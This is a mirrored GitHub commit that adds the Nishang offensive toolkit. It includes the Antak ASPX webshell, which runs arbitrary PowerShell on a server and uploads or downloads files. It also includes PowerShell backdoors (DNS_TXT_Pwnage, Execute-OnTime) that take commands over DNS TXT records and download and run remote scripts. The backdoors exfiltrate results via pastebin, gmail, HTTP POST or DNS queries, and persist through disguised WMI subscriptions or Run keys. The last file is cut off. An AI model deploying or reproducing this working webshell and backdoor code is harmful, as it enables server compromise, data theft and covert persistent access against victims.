Mirrors/webshell
2
0
Fork 0
mirror of https://github.com/tennc/webshell synced 2024-11-21 18:53:03 +00:00
Code Issues Projects Releases Packages Wiki Activity

update Antak-WebShell aspx

Browse source 
Antak-WebShell
This commit is contained in:
tennc 2014-07-30 17:50:54 +08:00
parent c77a9dad29
commit 300ccb3c8d
48 changed files with 9705 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

22
aspx/nishang/.gitattributes vendored Normal file
View file

@ -0,0 +1,22 @@
# Auto detect text files and perform LF normalization
* text=auto
# Custom for Visual Studio
*.cs diff=csharp
*.sln merge=union
*.csproj merge=union
*.vbproj merge=union
*.fsproj merge=union
*.dbproj merge=union
# Standard to msysgit
*.doc diff=astextplain
*.DOC diff=astextplain
*.docx diff=astextplain
*.DOCX diff=astextplain
*.dot diff=astextplain
*.DOT diff=astextplain
*.pdf diff=astextplain
*.PDF diff=astextplain
*.rtf diff=astextplain
*.RTF diff=astextplain

218
aspx/nishang/.gitignore vendored Normal file
View file

@ -0,0 +1,218 @@
#################
## Eclipse
#################
*.pydevproject
.project
.metadata
bin/
tmp/
*.tmp
*.bak
*.swp
*~.nib
local.properties
.classpath
.settings/
.loadpath
# External tool builders
.externalToolBuilders/
# Locally stored "Eclipse launch configurations"
*.launch
# CDT-specific
.cproject
# PDT-specific
.buildpath
#################
## Visual Studio
#################
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.sln.docstates
# Build results
[Dd]ebug/
[Rr]elease/
x64/
build/
[Bb]in/
[Oo]bj/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
*_i.c
*_p.c
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.log
*.scc
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opensdf
*.sdf
*.cachefile
# Visual Studio profiler
*.psess
*.vsp
*.vspx
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# NCrunch
*.ncrunch*
.*crunch*.local.xml
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.Publish.xml
*.pubxml
# NuGet Packages Directory
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
#packages/
# Windows Azure Build Output
csx
*.build.csdef
# Windows Store app package directory
AppPackages/
# Others
sql/
*.Cache
ClientBin/
[Ss]tyle[Cc]op.*
~$*
*~
*.dbmdl
*.[Pp]ublish.xml
*.pfx
*.publishsettings
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file to a newer
# Visual Studio version. Backup files are not needed, because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
App_Data/*.mdf
App_Data/*.ldf
#############
## Windows detritus
#############
# Windows image file caches
Thumbs.db
ehthumbs.db
# Folder config file
Desktop.ini
# Recycle Bin used on file shares
$RECYCLE.BIN/
# Mac crap
.DS_Store
#############
## Python
#############
*.py[co]
# Packages
*.egg
*.egg-info
dist/
build/
eggs/
parts/
var/
sdist/
develop-eggs/
.installed.cfg
# Installer logs
pip-log.txt
# Unit test / coverage reports
.coverage
.tox
#Translations
*.mo
#Mr Developer
.mr.developer.cfg
#TODO
TODO.txt

33
aspx/nishang/Antak-WebShell/Readme.md Normal file
View file

@ -0,0 +1,33 @@
Antak is a webshell written in ASP.Net which utilizes powershell.
Antak is a part of Nishang and updates could be found here:
https://github.com/samratashok/nishang
Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind
while using commands (like changing current directory or running session aware scripts).
Executing PowerShell scripts on the target -
1. Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
2. Use powershell one-liner (example below) for download & execute in the command box.
IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
3. By uploading the script to the target and executing it.
4. Make the script a semi-colon separated one-liner.
Files can be uploaded and downloaded using the respective buttons.
Uploading a file -
To upload a file you must mention the actual path on server (with write permissions) in command textbox.
(OS temporary directory like C:\Windows\Temp may be writable.)
Then use Browse and Upload buttons to upload file to that path.
Downloading a file -
To download a file enter the actual path on the server in command textbox.
Then click on Download button.
A detailed blog post on Antak could be found here
http://www.labofapenetrationtester.com/2014/06/introducing-antak.html

196
aspx/nishang/Antak-WebShell/antak.aspx Normal file
View file

@ -0,0 +1,196 @@
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.IO.Compression" %>
<%--Antak - A Webshell which utilizes powershell.--%>
<script Language="c#" runat="server">
protected override void OnInit(EventArgs e)
{
output.Text = @"Welcome to Antak - A Webshell in Powershell
Use help for more details.
Use clear to clear the screen.";
}
string do_ps(string arg)
{
//This section based on cmdasp webshell by http://michaeldaw.org
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "powershell.exe";
psi.Arguments = "-noninteractive " + "-executionpolicy bypass " + arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void ps(object sender, System.EventArgs e)
{
string option = console.Text.ToLower();
if (option.Equals("help"))
{
output.Text = @"Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind
while using commands (like changing current directory or running session aware scripts).
Executing PowerShell scripts on the target -
1. Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
2. Use powershell one-liner (example below) for download & execute in the command box.
IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
3. By uploading the script to the target and executing it.
4. Make the script a semi-colon separated one-liner.
Files can be uploaded and downloaded using the respective buttons.
Uploading a file -
To upload a file you must mention the actual path on server (with write permissions) in command textbox.
(OS temporary directory like C:\Windows\Temp may be writable.)
Then use Browse and Upload buttons to upload file to that path.
Downloading a file -
To download a file enter the actual path on the server in command textbox.
Then click on Download button.
Antak is a part of Nishang and updates could be found here:
https://github.com/samratashok/nishang
A detailed blog post on Antak could be found here
http://www.labofapenetrationtester.com/2014/06/introducing-antak.html
";
console.Text = string.Empty;
console.Focus();
}
else if (option.Equals("clear"))
{
output.Text = string.Empty;
console.Text = string.Empty;
console.Focus();
}
else
{
output.Text += "\nPS> " + console.Text + "\n" + do_ps(console.Text);
console.Text = string.Empty;
console.Focus();
}
}
void execcommand(string cmd)
{
output.Text += "PS> " + "\n" + do_ps(cmd);
console.Text = string.Empty;
console.Focus();
}
void base64encode(object sender, System.EventArgs e)
{
// Compression and encoding directly stolen from Compress-PostScript by Carlos Perez
//http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
string contents = console.Text;
// Compress Script
MemoryStream ms = new MemoryStream();
DeflateStream cs = new DeflateStream(ms, CompressionMode.Compress);
StreamWriter sw = new StreamWriter(cs, ASCIIEncoding.ASCII);
sw.WriteLine(contents);
sw.Close();
string code = Convert.ToBase64String(ms.ToArray());
string command = "Invoke-Expression $(New-Object IO.StreamReader (" +
"$(New-Object IO.Compression.DeflateStream (" +
"$(New-Object IO.MemoryStream (," +
"$([Convert]::FromBase64String('" + code + "')))), " +
"[IO.Compression.CompressionMode]::Decompress))," +
" [Text.Encoding]::ASCII)).ReadToEnd();";
execcommand(command);
}
protected void uploadbutton_Click(object sender, EventArgs e)
{
if (upload.HasFile)
{
try
{
string filename = Path.GetFileName(upload.FileName);
upload.SaveAs(console.Text + "\\" + filename);
output.Text = "File uploaded to: " + console.Text + "\\" + filename;
}
catch (Exception ex)
{
output.Text = "Upload status: The file could not be uploaded. The following error occured: " + ex.Message;
}
}
}
protected void downloadbutton_Click(object sender, EventArgs e)
{
try
{
Response.ContentType = "application/octet-stream";
Response.AppendHeader("Content-Disposition", "attachment; filename=" + console.Text);
Response.TransmitFile(console.Text);
Response.End();
}
catch (Exception ex)
{
output.Text = ex.ToString();
}
}
</script>
<HTML>
<HEAD>
<title>Antak Webshell</title>
</HEAD>
<body bgcolor="#808080">
<div>
<form id="Form1" method="post" runat="server" style="background-color: #808080">
<div style="text-align:center; resize:vertical">
<asp:TextBox ID="output" runat="server" TextMode="MultiLine" BackColor="#012456" ForeColor="White" style="height: 526px; width: 891px;" ReadOnly="True"></asp:TextBox>
<asp:TextBox ID="console" runat="server" BackColor="#012456" ForeColor="Yellow" Width="891px" TextMode="MultiLine" Rows="1" onkeydown="if(event.keyCode == 13) document.getElementById('cmd').click()" Height="23px" AutoCompleteType="None"></asp:TextBox>
</div>
<div style="width: 1100px; text-align:center">
<asp:Button ID="cmd" runat="server" Text="Submit" OnClick="ps" />
<asp:FileUpload ID="upload" runat="server"/>
<asp:Button ID="uploadbutton" runat="server" Text="Upload the File" OnClick="uploadbutton_Click" />
<asp:Button ID="encode" runat="server" Text="Encode and Execute" OnClick="base64encode" />
<asp:Button ID="downloadbutton" runat="server" Text="Download" OnClick="downloadbutton_Click" />
</div>
</form>
</div>
</body>
</HTML>

393
aspx/nishang/Backdoors/DNS_TXT_Pwnage.ps1 Normal file
View file

@ -0,0 +1,393 @@
<#
.SYNOPSIS
Payload which acts as a backdoor and is capable of recieving commands and PowerShell scripts from DNS TXT queries.
.DESCRIPTION
This payload continuously queries a subdomain's TXT records. It could be sent commands and powershell scripts to be
executed on the target machine by TXT messages of a domain. The powershell scripts which would be served as TXT record
MUST be encoded using Invoke-Encode.ps1 in the utility folder.
If using DNS or Webserver ExfilOption, use Invoke-Decode.ps1 in the Utility folder to decode.
.PARAMETER startdomain
The domain (or subdomain) whose TXT records would be checked regularly for further instructions.
.PARAMETER cmdstring
The string, if responded by TXT record of startdomain, will make the payload query "commanddomain" for commands.
.PARAMETER commanddomain
The domain (or subdomain) whose TXT records would be used to issue commands to the payload.
.PARAMETER psstring
The string, if responded by TXT record of startdomain, will make the payload query "psdomain" for encoded powershell script.
.PARAMETER psdomain
The domain (or subdomain) which would be used to provide powershell scripts from its TXT records.
.PARAMETER stopstring
The string, if responded by TXT record of startdomain, will stop this payload on the target.
.PARAMETER AUTHNS
Authoritative Name Server for the domains (or startdomain in case you are using separate domains). Startdomain
would be changed for commands and an authoritative reply shoudl reflect changes immediately.
.PARAMETER exfil
Use this option for using exfiltration
.PARAMETER ExfilOption
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
.PARAMETER dev_key
The Unique API key provided by pastebin when you register a free account.
Unused for other options
.PARAMETER username
Username for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER password
Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER URL
The URL of the webserver where POST requests would be sent.
.PARAMETER DomainName
The DomainName, whose subdomains would be used for sending TXT queries to.
.PARAMETER ExfilNS
Authoritative Name Server for the domain specified in DomainName.
.PARAMETER persist
Use this parameter for reboot persistence
.PARAMETER NoLoadFunction
This parameter is used for specifying that the script used in txt records $psdomain does NOT contain a function.
If the parameter is not specified the payload assumes that the script pulled from txt records would need function name to be executed.
This would be the case if you are using Nishang scripts with this backdoor.
.EXAMPLE
PS > DNS_TXT_Pwnage
The payload will ask for all required options.
.EXAMPLE
PS > DNS_TXT_Pwnage start.alteredsecurity.com begincommands command.alteredsecurity.com startscript encscript.alteredsecurity.com stop ns8.zoneedit.com
In the above example if you want to execute commands. TXT record of start.alteredsecurity.com
must contain only "begincommands" and command.alteredsecurity.com should conatin a single command
you want to execute. The TXT record could be changed live and the payload will pick up updated
record to execute new command.
To execute a script in above example, start.alteredsecurity.com must contain "startscript". As soon it matches, the payload will query
psdomain looking for a base64encoded powershell script. Use the StringToBase64 function to encode scripts to base64.
.EXAMPLE
PS > DNS_TXT_Pwnage start.alteredsecurity.com begincommands command.alteredsecurity.com startscript encscript.alteredsecurity.com stop ns8.zoneedit.com -exfil -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
Use above command for using sending POST request to your webserver which is able to log the requests.
.EXAMPLE
PS > DNS_TXT_Pwnage -persist
Use above for reboot persistence.
.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>
function DNS_TXT_Pwnage
{
[CmdletBinding(DefaultParameterSetName="noexfil")] Param(
[Parameter(Parametersetname="exfil")]
[Switch]
$persist,
[Parameter(Parametersetname="exfil")]
[Switch]
$exfil,
[Parameter(Parametersetname="exfil")]
[Switch]
$NoLoadFunction,
[Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")]
[String]
$startdomain,
[Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
[String]
$cmdstring,
[Parameter(Position = 2, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 2, Mandatory = $True, Parametersetname="noexfil")]
[String]
$commanddomain,
[Parameter(Position = 3, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 3, Mandatory = $True, Parametersetname="noexfil")]
[String]
$psstring,
[Parameter(Position = 4, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 4, Mandatory = $True, Parametersetname="noexfil")]
[String]
$psdomain,
[Parameter(Position = 5, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 5, Mandatory = $True, Parametersetname="noexfil")]
[String]
$StopString,
[Parameter(Position = 6, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 6, Mandatory = $True, Parametersetname="noexfil")]
[String]$AuthNS,
[Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
[String]
$ExfilOption,
[Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
[String]
$dev_key = "null",
[Parameter(Position = 9, Mandatory = $False, Parametersetname="exfil")]
[String]
$username = "null",
[Parameter(Position = 10, Mandatory = $False, Parametersetname="exfil")]
[String]
$password = "null",
[Parameter(Position = 11, Mandatory = $False, Parametersetname="exfil")]
[String]
$URL = "null",
[Parameter(Position = 12, Mandatory = $False, Parametersetname="exfil")]
[String]
$DomainName = "null",
[Parameter(Position = 13, Mandatory = $False, Parametersetname="exfil")]
[String]
$ExfilNS = "null"
)
$body = @'
function DNS-TXT-Logic ($Startdomain, $cmdstring, $commanddomain, $psstring, $psdomain, $Stopstring, $AuthNS, $ExfilOption, $dev_key, $username, $password, $URL, $DomainName, $ExfilNS, $exfil, $LoadFunction)
{
while($true)
{
$exec = 0
start-sleep -seconds 5
$getcode = (Invoke-Expression "nslookup -querytype=txt $startdomain $AuthNS")
$tmp = $getcode | select-string -pattern "`""
$startcode = $tmp -split("`"")[0]
if ($startcode[1] -eq $cmdstring)
{
start-sleep -seconds 5
$getcommand = (Invoke-Expression "nslookup -querytype=txt $commanddomain $AuthNS")
$temp = $getcommand | select-string -pattern "`""
$command = $temp -split("`"")[0]
$pastevalue = Invoke-Expression $command[1]
$pastevalue
$exec++
if ($exfil -eq $True)
{
$pastename = $env:COMPUTERNAME + " Results of DNS TXT Pwnage: "
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$ExfilNS"
}
if ($exec -eq 1)
{
Start-Sleep -Seconds 60
}
}
if ($startcode[1] -match $psstring)
{
$getcommand = (Invoke-Expression "nslookup -querytype=txt $psdomain $AuthNS")
$temp = $getcommand | select-string -pattern "`""
$tmp1 = ""
foreach ($txt in $temp)
{
$tmp1 = $tmp1 + $txt
}
$encdata = $tmp1 -replace '\s+', "" -replace "`"", ""
#Decode the downloaded powershell script. The decoding logic is of Invoke-Decode in Utility directory.
$dec = [System.Convert]::FromBase64String($encdata)
$ms = New-Object System.IO.MemoryStream
$ms.Write($dec, 0, $dec.Length)
$ms.Seek(0,0) | Out-Null
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress)
$sr = New-Object System.IO.StreamReader($cs)
$command = $sr.readtoend()
# Check for the function loaded by the script.
$preloading = Get-ChildItem function:\
Invoke-Expression $command
$postloading = Get-ChildItem function:\
$diffobj = Compare-Object $preloading $postloading
$FunctionName = $diffobj.InputObject.Name
$pastevalue = Invoke-Expression $FunctionName
if ($NoLoadFunction -eq $True)
{
$pastevalue = Invoke-Expression $command
}
$pastevalue
$exec++
if ($exfil -eq $True)
{
$pastename = $env:COMPUTERNAME + " Results of DNS TXT Pwnage: "
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$ExfilNS"
}
if ($exec -eq 1)
{
Start-Sleep -Seconds 60
}
}
if($startcode[1] -eq $StopString)
{
break
}
}
}
'@
$exfiltration = @'
function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$ExfilNS)
{
function post_http($url,$parameters)
{
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open("POST", $url, $false)
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
$http_request.setRequestHeader("Content-length", $parameters.length);
$http_request.setRequestHeader("Connection", "close")
$http_request.send($parameters)
$script:session_key=$http_request.responseText
}
function Compress-Encode
{
#Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
$encdata = [string]::Join("`n", $pastevalue)
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$sw.Write($encdata)
$sw.Close();
$Compressed = [Convert]::ToBase64String($ms.ToArray())
$Compressed
}
if ($exfiloption -eq "pastebin")
{
$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
}
elseif ($exfiloption -eq "gmail")
{
#http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
$smtpserver = smtp.gmail.com
$msg = new-object Net.Mail.MailMessage
$smtp = new-object Net.Mail.SmtpClient($smtpServer )
$smtp.EnableSsl = $True
$smtp.Credentials = New-Object System.Net.NetworkCredential($username, $password);
$msg.From = $username@gmail.com
$msg.To.Add($username@gmail.com)
$msg.Subject = $pastename
$msg.Body = $pastevalue
if ($filename)
{
$att = new-object Net.Mail.Attachment($filename)
$msg.Attachments.Add($att)
}
$smtp.Send($msg)
}
elseif ($exfiloption -eq "webserver")
{
$Data = Compress-Encode
post_http $URL $Data
}
elseif ($ExfilOption -eq "DNS")
{
$lengthofsubstr = 0
$code = Compress-Encode
$queries = [int]($code.Length/63)
while ($queries -ne 0)
{
$querystring = $code.Substring($lengthofsubstr,63)
Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $ExfilNS"
$lengthofsubstr += 63
$queries -= 1
}
$mod = $code.Length%63
$query = $code.Substring($code.Length - $mod, $mod)
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $ExfilNS"
}
}
'@
$modulename = "DNS_TXT_Pwnage.ps1"
if($persist -eq $True)
{
$name = "persist.vbs"
$options = "DNS-TXT-Logic $Startdomain $cmdstring $commanddomain $psstring $psdomain $Stopstring $AuthNS $LoadFuntion"
if ($exfil -eq $True)
{
$options = "DNS-TXT-Logic $Startdomain $cmdstring $commanddomain $psstring $psdomain $Stopstring $AuthNS $ExfilOption $dev_key $username $password $URL $DomainName $ExfilNS $exfil $LoadFunction"
}
Out-File -InputObject $body -Force $env:TEMP\$modulename
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
Out-File -InputObject $options -Append $env:TEMP\$modulename
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
{
$scriptpath = $env:TEMP
$scriptFileName = "$scriptpath\$name"
$filterNS = "root\cimv2"
$wmiNS = "root\subscription"
$query = @"
Select * from __InstanceCreationEvent within 30
where targetInstance isa 'Win32_LogonSession'
"@
$filterName = "WindowsSanity"
$filterPath = Set-WmiInstance -Class __EventFilter -Namespace $wmiNS -Arguments @{name=$filterName; EventNameSpace=$filterNS; QueryLanguage="WQL"; Query=$query}
$consumerPath = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace $wmiNS -Arguments @{name="WindowsSanity"; ScriptFileName=$scriptFileName; ScriptingEngine="VBScript"}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace $wmiNS -arguments @{Filter=$filterPath; Consumer=$consumerPath} | out-null
}
else
{
New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
}
}
else
{
$options = "DNS-TXT-Logic $Startdomain $cmdstring $commanddomain $psstring $psdomain $Stopstring $AuthNS $LoadFuntion"
if ($exfil -eq $True)
{
$options = "DNS-TXT-Logic $Startdomain $cmdstring $commanddomain $psstring $psdomain $Stopstring $AuthNS $ExfilOption $dev_key $username $password $URL $DomainName $ExfilNS $exfil $LoadFunction"
}
Out-File -InputObject $body -Force $env:TEMP\$modulename
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
Out-File -InputObject $options -Append $env:TEMP\$modulename
Invoke-Expression $env:TEMP\$modulename
}
}

305
aspx/nishang/Backdoors/Execute-OnTime.ps1 Normal file
View file

@ -0,0 +1,305 @@
<#
.SYNOPSIS
Nishang Payload which waits till given time to execute a script.
.DESCRIPTION
This payload waits till the given time (on the victim) and then downloads a PowerShell script and executes it.
If using DNS or Webserver ExfilOption, use Invoke-Decode.ps1 in the Utility folder to decode.
.PARAMETER PayloadURL
The URL from where the file would be downloaded.
.PARAMETER time
The Time when the payload will be executed (in 24 hour format e.g. 23:21).
.PARAMETER CheckURL
The URL which the payload would check for instructions to stop.
.PARAMETER StopString
The string which if found at CheckURL will stop the payload.
.PARAMETER persist
Use this parameter to achieve reboot persistence. Different methods of persistence with Admin access and normal user access.
PARAMETER exfil
Use this parameter to use exfiltration methods for returning the results.
.PARAMETER ExfilOption
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
.PARAMETER dev_key
The Unique API key provided by pastebin when you register a free account.
Unused for other options
.PARAMETER username
Username for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER password
Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER URL
The URL of the webserver where POST requests would be sent.
.PARAMETER DomainName
The DomainName, whose subdomains would be used for sending TXT queries to.
.PARAMETER AuthNS
Authoritative Name Server for the domain specified in DomainName
.EXAMPLE
PS > Execute-OnTime http://example.com/script.ps1 hh:mm http://pastebin.com/raw.php?i=Zhyf8rwh stoppayload
EXAMPLE
PS > Execute-OnTime http://pastebin.com/raw.php?i=Zhyf8rwh hh:mm http://pastebin.com/raw.php?i=jqP2vJ3x stoppayload -exfil -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php>
Use above when using the payload from non-interactive shells.
.EXAMPLE
PS > Execute-OnTime -persist
Use above for reboot persistence.
.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>
function Execute-OnTime
{
[CmdletBinding(DefaultParameterSetName="noexfil")] Param(
[Parameter(Parametersetname="exfil")]
[Switch]
$persist,
[Parameter(Parametersetname="exfil")]
[Switch]
$exfil,
[Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")]
[String]
$PayloadURL,
[Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
[String]
$time,
[Parameter(Position = 2, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 2, Mandatory = $True, Parametersetname="noexfil")]
[String]
$CheckURL,
[Parameter(Position = 3, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 3, Mandatory = $True, Parametersetname="noexfil")]
[String]
$StopString,
[Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
[String]
$ExfilOption,
[Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")]
[String]
$dev_key = "null",
[Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
[String]
$username = "null",
[Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
[String]
$password = "null",
[Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
[String]
$URL = "null",
[Parameter(Position = 9, Mandatory = $False, Parametersetname="exfil")]
[String]
$DomainName = "null",
[Parameter(Position = 10, Mandatory = $False, Parametersetname="exfil")]
[String]
$AuthNS = "null"
)
$body = @'
function Logic-Execute-OnTime ($PayloadURL, $time, $CheckURL, $StopString, $ExfilOption, $dev_key, $username, $password, $URL, $DomainName, $AuthNS, $exfil)
{
while($true)
{
$exec = 0
start-sleep -seconds 5
$webclient = New-Object System.Net.WebClient
$filecontent = $webclient.DownloadString("$CheckURL")
$systime = Get-Date -UFormat %R
if ($systime -match $time)
{
$pastevalue = Invoke-Expression $webclient.DownloadString($PayloadURL)
$pastevalue
$exec++
if ($exfil -eq $True)
{
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$AuthNS"
}
if ($exec -eq 1)
{
Start-Sleep -Seconds 60
}
}
elseif ($filecontent -eq $StopString)
{
break
}
}
}
'@
$exfiltration = @'
function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$AuthNS)
{
function post_http($url,$parameters)
{
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open("POST", $url, $false)
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
$http_request.setRequestHeader("Content-length", $parameters.length);
$http_request.setRequestHeader("Connection", "close")
$http_request.send($parameters)
$script:session_key=$http_request.responseText
}
function Compress-Encode
{
#Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
$encdata = [string]::Join("`n", $pastevalue)
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$sw.Write($encdata)
$sw.Close();
$Compressed = [Convert]::ToBase64String($ms.ToArray())
$Compressed
}
if ($exfiloption -eq "pastebin")
{
$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
}
elseif ($exfiloption -eq "gmail")
{
#http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
$smtpserver = smtp.gmail.com
$msg = new-object Net.Mail.MailMessage
$smtp = new-object Net.Mail.SmtpClient($smtpServer )
$smtp.EnableSsl = $True
$smtp.Credentials = New-Object System.Net.NetworkCredential($username, $password);
$msg.From = $username@gmail.com
$msg.To.Add($username@gmail.com)
$msg.Subject = $pastename
$msg.Body = $pastevalue
if ($filename)
{
$att = new-object Net.Mail.Attachment($filename)
$msg.Attachments.Add($att)
}
$smtp.Send($msg)
}
elseif ($exfiloption -eq "webserver")
{
$Data = Compress-Encode
$Data
post_http $URL $Data
}
elseif ($ExfilOption -eq "DNS")
{
$lengthofsubstr = 0
$code = Compress-Encode
$queries = [int]($code.Length/63)
while ($queries -ne 0)
{
$querystring = $code.Substring($lengthofsubstr,63)
Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $AuthNS"
$lengthofsubstr += 63
$queries -= 1
}
$mod = $code.Length%63
$query = $code.Substring($code.Length - $mod, $mod)
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
}
}
'@
$modulename = "Execute-OnTime.ps1"
if($persist -eq $True)
{
$name = "persist.vbs"
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $dev_key $username $password $keyoutoption $exfil"
if ($exfil -eq $True)
{
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
}
Out-File -InputObject $body -Force $env:TEMP\$modulename
